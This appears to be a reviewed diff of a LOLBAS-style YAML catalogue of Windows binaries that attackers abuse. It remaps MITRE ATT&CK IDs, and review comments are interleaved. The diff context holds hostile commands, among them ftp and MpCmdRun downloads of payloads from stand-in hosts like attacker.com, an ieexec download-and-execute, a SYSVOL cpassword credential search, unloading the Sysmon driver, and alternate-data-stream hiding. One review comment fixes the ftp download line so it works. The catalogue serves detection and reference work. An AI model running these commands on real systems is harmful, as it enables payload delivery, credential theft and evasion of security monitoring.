|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: explorer.exe C:\Windows\System32\notepad.exe | ||||
|     Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe | ||||
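Review bot: the Description on the last line says "Execute calc.exe" but the Command launches C:\Windows\System32\notepad.exe; change one of the two so they agree.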
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows 10 (Tested) | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\explorer.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Program Files\Internet Explorer\Extexport.exe | ||||
|   | ||||
| @@ -9,16 +9,14 @@ Commands: | ||||
|     Usecase: Extract data from cab file and hide it in an alternate data stream. | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe | ||||
|     Description: Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file. | ||||
|     Usecase: Extract data from cab file and hide it in an alternate data stream. | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt | ||||
|     Description: Copy the source file to the destination file and overwrite it. | ||||
| @@ -26,7 +24,6 @@ Commands: | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: extrac32.exe /C C:\Windows\System32\calc.exe C:\Users\user\Desktop\calc.exe | ||||
|     Description: Command for copying calc.exe to another folder | ||||
| @@ -34,7 +31,6 @@ Commands: | ||||
|     Category: Copy | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\extrac32.exe | ||||
|   | ||||
| @@ -9,24 +9,21 @@ Commands: | ||||
|     Usecase: Add a file to an alternate data stream to hide from defensive counter measures | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe | ||||
|     Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file. | ||||
|     Usecase: Add a file to an alternate data stream from a webdav server to hide from defensive counter measures | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: findstr /S /I cpassword \\sysvol\policies\*.xml | ||||
|     Description: Search for stored password in Group Policy files stored on SYSVOL. | ||||
|     Usecase: Find credentials stored in cpassword attrbute | ||||
|     Category: Credentials | ||||
|     Privileges: User | ||||
|     MitreID: T1081 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1081 | ||||
|     MitreID: T1552.001 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.exe | ||||
|     Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is downloaded to the target file. | ||||
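Review bot: typo in the Usecase of the cpassword entry, "attrbute" should be "attribute". The T1081 to T1552.001 move for that entry is correct in form, unlike the parent-level IDs left elsewhere in this commit.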
| @@ -34,7 +31,6 @@ Commands: | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1185 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1185 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\findstr.exe | ||||
|   | ||||
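Review bot: MitreID T1185 is kept for the findstr Download entry at the top of this hunk while its MitreLink is removed; every other Category: Download entry in this commit maps to T1105, and T1185 has nothing to do with fetching a file over WebDAV, so this looks like a mis-mapping the realignment should have corrected rather than preserved.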
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/techniques/T1105 | ||||
|     OperatingSystem: Windows 8.1, Windows 10, Windows 11, Windows Server 2008, Windows Server 2008R2, Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019, Windows Server 2022 | ||||
| Full_Path: | ||||
|   - Path: c:\windows\system32\finger.exe | ||||
|   | ||||
| @@ -7,14 +7,13 @@ Commands: | ||||
|   - Command: fltMC.exe unload SysmonDrv | ||||
|     Description: Unloads a driver used by security agents | ||||
|     Usecase: Defense evasion | ||||
|     Category: ADS  | ||||
|     Category: ADS | ||||
|     Privileges: Admin | ||||
|     MitreID: T1562 | ||||
|     MitreLink: https://attack.mitre.org/techniques/T1562/002/ | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\fltMC.exe | ||||
| Code_Sample:  | ||||
| Code_Sample: | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: 4688 events with fltMC.exe | ||||
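Review bot: `Category: ADS` is wrong for `fltMC.exe unload SysmonDrv`; nothing in that command touches an alternate data stream, and the whitespace-only edit to that line was the moment to fix it. The removed MitreLink pointed at sub-technique T1562.002 while `MitreID: T1562` stays at the parent; since this sprint moves other entries to sub-techniques, pick the right one here, and unloading a security tool's minifilter is T1562.001 (Disable or Modify Tools), not .002 (Disable Windows Event Logging). The `- Code:` item under Code_Sample is left with no value; either drop the list item or point it at a sample.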
|   | ||||
| @@ -10,15 +10,13 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe" | ||||
|     Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder. | ||||
|     Usecase: Use forfiles to start a new process from a binary hidden in an alternate data stream | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\forfiles.exe | ||||
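Review bot: `Alternate Data Stream (AD)` in the forfiles ADS entry should read `(ADS)`, matching the abbreviation used in the Category line two lines below.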
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v" | ||||
|     Description: Download | ||||
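Review bot: the ftp download command at the end of this hunk has a redirect bug: in cmd.exe a single digit written directly before `>` is taken as the handle number, so `@echo open attacker.com 21>ftp.txt` is parsed as `echo open attacker.com 2` followed by a `1>ftp.txt` redirect, and the generated script tells ftp to open port 2, not 21. Put a space before the redirect (`@echo open attacker.com 21 >ftp.txt`) so the port survives.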
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\ftp.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/techniques/T1105/ | ||||
|     OperatingSystem: Windows 10 | ||||
| Full_Path: | ||||
|   - Path: c:\windows\system32\driverstore\filerepository\64kb6472.inf_amd64_3daef03bbe98572b\ | ||||
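Review bot: the Full_Path entry ends in a directory (`...\64kb6472.inf_amd64_3daef03bbe98572b\`) and never names the executable that performs the download, so the path cannot be used in a detection rule as written; add the binary name. The `inf_amd64_<hash>` folder under driverstore\filerepository is specific to one driver package version, so the fixed hash should be expressed as a pattern rather than a literal.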
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: Administrator | ||||
|     MitreID: T1216 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1216 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: Gpscript /startup | ||||
|     Description: Executes startup scripts configured in Group Policy | ||||
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: Administrator | ||||
|     MitreID: T1216 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1216 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\gpscript.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: HH.exe c:\windows\system32\calc.exe | ||||
|     Description: Executes calc.exe with HTML Help. | ||||
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1216 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1216 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\hh.exe | ||||
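Review bot: `MitreID: T1216` on the `HH.exe c:\windows\system32\calc.exe` Execute entry is the wrong family; T1216 is Signed Script Proxy Execution, and hh.exe is a signed binary, so it belongs under T1218, which also has the dedicated sub-technique T1218.001 (Compiled HTML File) for the .chm case. Since this sprint moves mshta to T1218.005 and msiexec to T1218.007, hh.exe should get the same treatment.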
|   | ||||
| @@ -5,12 +5,11 @@ Author: 'Wade Hickey' | ||||
| Created: '2020-03-05' | ||||
| Commands: | ||||
|   - Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw | ||||
|     Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION> or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>  | ||||
|     Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION> or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION> | ||||
|     Usecase: Download file from Internet | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe | ||||
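Review bot: the IMEWDBLD description mixes path separators (`INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>`); use backslashes throughout so the cache path can be copied into a detection rule as-is. The trailing-whitespace fix on that line is fine.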
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: c:\windows\system32\ie4uinit.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: ieexec.exe http://x.x.x.x:8080/bypass.exe | ||||
|     Description: Downloads and executes bypass.exe from the remote server. | ||||
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Compile | ||||
|     Privileges: User | ||||
|     MitreID: T1127 | ||||
|     MitreLink: https://attack.mitre.org/techniques/T1127/ | ||||
|     OperatingSystem: Windows 10,7 | ||||
|   - Command: ilasm.exe C:\public\test.txt /dll | ||||
|     Description: Binary file used by .NET to compile c# code to dll | ||||
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: Compile | ||||
|     Privileges: User | ||||
|     MitreID: T1127 | ||||
|     MitreLink: https://attack.mitre.org/techniques/T1127/ | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe | ||||
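Review bot: the second ilasm command (`ilasm.exe C:\public\test.txt /dll`) has no `OperatingSystem` line, unlike the first command and every other entry in this sprint; add one. Its description also says ilasm compiles `c# code`, but ilasm is the IL assembler and consumes CIL text, so `test.txt` must contain IL, not C# (csc.exe is the C# compiler); reword the description accordingly.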
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\Infdefaultinstall.exe | ||||
|   | ||||
| @@ -9,16 +9,14 @@ Commands: | ||||
|     Usecase: Use to execute code and bypass application whitelisting | ||||
|     Category: AWL bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1118 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1118 | ||||
|     MitreID: T1218.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll | ||||
|     Description: Execute the target .NET DLL or EXE. | ||||
|     Usecase: Use to execute code and bypass application whitelisting | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1118 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1118 | ||||
|     MitreID: T1218.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe | ||||
| @@ -32,7 +30,7 @@ Detection: | ||||
| Resources: | ||||
|   - Link: https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/ | ||||
|   - Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12 | ||||
|   - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1118/T1118.md | ||||
|   - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md | ||||
|   - Link: https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/ | ||||
|   - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ | ||||
|   - Link: https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Compile | ||||
|     Privileges: User | ||||
|     MitreID: T1127 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1127 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: jsc.exe /t:library Library.js | ||||
|     Description: Use jsc.exe to compile javascript code stored in Library.js and output Library.dll. | ||||
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: Compile | ||||
|     Privileges: User | ||||
|     MitreID: T1127 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1127 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Jsc.exe | ||||
|   | ||||
| @@ -9,16 +9,14 @@ Commands: | ||||
|     Usecase: Hide data compressed into an alternate data stream | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab | ||||
|     Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file. | ||||
|     Usecase: Hide data compressed into an alternate data stream | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab | ||||
|     Description: Download and compresses the target file and stores it in the target file. | ||||
| @@ -26,7 +24,6 @@ Commands: | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\makecab.exe | ||||
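Review bot: the description of the makecab Download entry, `Download and compresses the target file and stores it in the target file`, is ungrammatical and names the same file twice; reword to something like `Downloads the source file, compresses it and stores the CAB at the target path`.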
|   | ||||
| @@ -9,16 +9,14 @@ Commands: | ||||
|     Usecase: Inject dll file into running process | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     MitreID: T1218.013 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll" | ||||
|     Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172 | ||||
|     Usecase: Inject dll file into running process | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\mavinject.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1127 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1127 | ||||
|     OperatingSystem: Windows 10S | ||||
|   - Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt | ||||
|     Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file. | ||||
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1127 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1127 | ||||
|     OperatingSystem: Windows 10S | ||||
|   - Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt | ||||
|     Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file. | ||||
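Review bot: the command ending this hunk, `Microsoft.Workflow.Compiler.exe tests.txt results.txt`, is byte-for-byte the same command and description that ended the previous hunk, so the file lists one command twice (once as Execute, once as AWL Bypass in the hunk that follows); if both categories are wanted, the two entries need distinct Usecase text, otherwise collapse them into one. In both copies the description refers to `test.txt` while the command reads `tests.txt`.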
| @@ -26,7 +24,6 @@ Commands: | ||||
|     Category: AWL Bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1127 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1127 | ||||
|     OperatingSystem: Windows 10S | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe | ||||
|   | ||||
| @@ -9,8 +9,7 @@ Commands: | ||||
|     Usecase: Configure a snap-in to load a COM custom class (CLSID) that has been added to the registry | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     MitreID: T1218.014 | ||||
|     OperatingSystem: Windows 10 (and possibly earlier versions) | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\mmc.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows 10 | ||||
|   - Command: copy "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" C:\Users\Public\Downloads\MP.exe && chdir "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\" && "C:\Users\Public\Downloads\MP.exe" -DownloadFile -url https://attacker.server/beacon.exe -path C:\Users\Public\Downloads\evil.exe | ||||
|     Description: Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path) [updated version to bypass Windows 10 mitigation] | ||||
| @@ -18,15 +17,13 @@ Commands: | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows 10 | ||||
|   - Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\nicefile.txt:evil.exe | ||||
|     Description: Download file to machine and store it in Alternate Data Stream | ||||
|     Usecase: Hide downloaded data inton an Alternate Data Stream | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.4-0\MpCmdRun.exe | ||||
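Review bot: `c:\\temp\\nicefile.txt:evil.exe` in the MpCmdRun ADS command is a plain YAML scalar, so the doubled backslashes are rendered literally on the site; use single backslashes as in the other commands. `inton` in the Usecase is a typo for `into`. The Full_Path pins `Platform\4.18.2008.4-0` while the commands above use `4.18.2008.9-0`; that directory is versioned with every Defender platform update, so express it as a pattern rather than a literal build number.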
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: AWL bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1127 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1127 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: msbuild.exe project.csproj | ||||
|     Description: Build and execute a C# project stored in the target csproj file. | ||||
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1127 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1127 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: msbuild.exe @sample.rsp | ||||
|     Description: Executes Logger statements from rsp file  | ||||
| @@ -42,8 +40,7 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1127 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1127 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10     | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe | ||||
| @@ -52,7 +49,7 @@ Full_Path: | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe | ||||
|   - Path: C:\Program Files (x86)\MSBuild\14.0\bin\MSBuild.exe | ||||
| Code_Sample:  | ||||
| Code_Sample: | ||||
|   - Code: | ||||
| Detection: | ||||
|  - IOC: Msbuild.exe should not normally be executed on workstations | ||||
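Review bot: `- Code:` under Code_Sample has no value, so the msbuild page renders an empty sample entry; either drop the list item or populate it.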
| @@ -71,4 +68,4 @@ Acknowledgement: | ||||
|     Handle: '@Cneelis' | ||||
|   - Person: Jimmy | ||||
|     Handle: '@bohops' | ||||
| --- | ||||
| --- | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: Administrator | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\msconfig.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE | ||||
|     Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file. | ||||
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: AWL bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\Msdt.exe | ||||
|   | ||||
| @@ -9,32 +9,28 @@ Commands: | ||||
|     Usecase: Execute code | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1170 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1170 | ||||
|     MitreID: T1218.005 | ||||
